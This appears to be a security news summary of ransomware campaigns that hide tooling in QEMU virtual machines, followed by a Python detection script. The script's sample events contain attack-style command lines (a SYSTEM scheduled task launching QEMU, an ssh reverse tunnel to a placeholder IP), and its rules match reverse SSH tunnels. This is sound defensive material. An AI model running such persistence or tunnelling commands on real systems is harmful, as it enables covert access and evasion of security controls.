
Payouts King ransomware abuses QEMU for hidden VMs and backdoors

The Payouts King ransomware operation is using the QEMU emulator to create hidden virtual machines and establish reverse SSH backdoors on compromised systems, letting the attackers bypass endpoint security controls. Because the malicious tooling runs inside a guest VM rather than directly on the host, attackers can execute payloads and stage sensitive data on the machine without the host's security agents seeing it. Bleeping Computer has further coverage.

Researchers have identified two distinct campaigns that use QEMU. The first, linked to the GOLD ENCOUNTER threat group and Payouts King ransomware, uses QEMU to run a hidden Alpine Linux VM as SYSTEM. This VM contains tools for credential harvesting and data exfiltration. Initial access in this campaign was achieved through exposed SonicWall VPNs and SolarWinds Web Help Desk vulnerabilities.

The second campaign exploits the CitrixBleed 2 vulnerability to gain access, then deploys a QEMU VM with manually installed tools for reconnaissance and data staging. Both campaigns show a sophisticated use of virtualization to evade detection and support malicious activity. Organizations should implement robust monitoring for unauthorized QEMU instances, suspicious scheduled tasks, and unusual SSH activity.
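The three monitoring points named above map directly onto process-creation telemetry. The following is an added example, not code from the article or from any vendor, that runs simple detection rules over constructed Sysmon/EDR-style JSON event lines: a QEMU binary launched from outside an assumed approved install directory or as SYSTEM, a scheduled task created to launch QEMU, and an ssh client invoked with a reverse-forward (-R) tunnel. The sample events, the WinUpdateSvc task name, the ProgramData path and the 198.51.100.10 address are all constructed for illustration, and the APPROVED_QEMU_DIRS allowlist is an assumption a deployment would replace with its own.

```python
import json
import ntpath
import re

# Assumed allowlist: directories from which a sanctioned QEMU install is expected to run.
APPROVED_QEMU_DIRS = (r"c:\program files\qemu",)

# qemu-system-<arch> binaries, with or without .exe
QEMU_IMAGE_RE = re.compile(r"^qemu-system-\w+(\.exe)?$", re.IGNORECASE)
# ssh "-R port:host:hostport" (also combined forms such as "-NR"); ssh flags are case-sensitive
REVERSE_SSH_RE = re.compile(r"(?:^|\s)-[A-Za-z]*R\s+\S+:\S+")

# Constructed sample process-creation events (not from the article). Fields loosely
# mimic a Sysmon/EDR record: user, image path, command line, parent process.
SAMPLE_EVENTS = [
    r'{"user": "NT AUTHORITY\\SYSTEM", "image": "C:\\ProgramData\\qemu\\qemu-system-x86_64.exe", "cmdline": "qemu-system-x86_64.exe -m 2048 -drive file=alpine.qcow2 -nographic", "parent": "svchost.exe"}',
    r'{"user": "NT AUTHORITY\\SYSTEM", "image": "C:\\Windows\\System32\\schtasks.exe", "cmdline": "schtasks.exe /create /tn WinUpdateSvc /tr \"C:\\ProgramData\\qemu\\qemu-system-x86_64.exe -nographic\" /ru SYSTEM /sc onstart", "parent": "cmd.exe"}',
    r'{"user": "NT AUTHORITY\\SYSTEM", "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe", "cmdline": "ssh.exe -N -R 2222:127.0.0.1:22 tunnel@198.51.100.10", "parent": "cmd.exe"}',
    r'{"user": "CORP\\alice", "image": "C:\\Program Files\\qemu\\qemu-system-x86_64.exe", "cmdline": "qemu-system-x86_64.exe -m 4096 -drive file=devbox.qcow2", "parent": "explorer.exe"}',
    r'{"user": "CORP\\alice", "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe", "cmdline": "ssh.exe alice@jumphost.corp.example", "parent": "WindowsTerminal.exe"}',
    r'{"user": "CORP\\alice", "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe notes.txt", "parent": "explorer.exe"}',
]


def evaluate(event: dict) -> list[str]:
    """Return the names of every detection rule the event triggers."""
    hits = []
    image = event.get("image", "")
    cmdline = event.get("cmdline", "")
    user = event.get("user", "")
    # ntpath handles Windows separators regardless of the host OS running this script
    name = ntpath.basename(image).lower()
    folder = ntpath.dirname(image).lower()

    # Rule 1: QEMU running from an unexpected location or under the SYSTEM account
    if QEMU_IMAGE_RE.match(name):
        if folder not in APPROVED_QEMU_DIRS or user.upper().endswith("SYSTEM"):
            hits.append("unauthorized_qemu_instance")

    # Rule 2: a scheduled task being created whose action launches QEMU
    lowered = cmdline.lower()
    if name == "schtasks.exe" and "/create" in lowered and "qemu" in lowered:
        hits.append("scheduled_task_launching_qemu")

    # Rule 3: an ssh client opening a reverse tunnel back to a remote host
    if name in ("ssh.exe", "ssh") and REVERSE_SSH_RE.search(cmdline):
        hits.append("reverse_ssh_tunnel")

    return hits


def analyze(lines: list[str]) -> list[dict]:
    """Parse JSON event lines and collect findings; malformed lines are skipped."""
    findings = []
    for number, line in enumerate(lines, 1):
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        for rule in evaluate(event):
            findings.append({
                "line": number,
                "rule": rule,
                "user": event.get("user", ""),
                "cmdline": event.get("cmdline", ""),
            })
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f"line {finding['line']}: {finding['rule']} ({finding['user']}) :: {finding['cmdline']}")
```

Run against the constructed events, the first three lines each produce one finding and the three benign lines produce none. In practice the allowlist check is the part worth tuning: an approved QEMU install path alone is not enough when the binary is copied elsewhere and renamed, so pairing this with file-hash or signer checks on the image is the natural next step.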

Source: Bleeping Computer
